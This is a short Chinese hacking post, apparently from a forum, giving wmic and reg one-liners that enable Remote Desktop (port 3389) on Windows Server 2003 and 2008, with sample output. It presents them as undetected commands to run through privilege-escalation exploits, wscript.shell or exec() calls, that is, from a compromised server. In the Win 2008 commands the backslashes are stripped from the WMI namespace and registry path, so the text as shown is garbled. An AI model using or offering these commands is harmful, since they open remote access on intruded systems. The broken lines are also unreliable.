网上流传了很多开3389的exe小工具,还有读写注册表的bat批处理,有的是操作注册表,有的是操作各种组件
这里提供一个不会被拦截,而且可以使用的开3389的cmd一句话
Win 2003:
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
不管你是溢出提权工具,还是 wscript.shell
或者是 system()
, exec()
等等,都可以用这个来尝试开启3389
亲测比批处理好用多了
测试回显
正在安装 WMIC,请稍候。执行 (\\JOINR410-1\ROOT\CIMV2:Win32_TerminalServiceSetting.ServerName="JOINR410-1")->SetAllowTSConnections() 方法执行成功。 输出参数: instance of __PARAMETERS { ReturnValue = 0; };
Win 2008
wmic /namespace:\rootcimv2terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 wmic /namespace:\rootcimv2terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f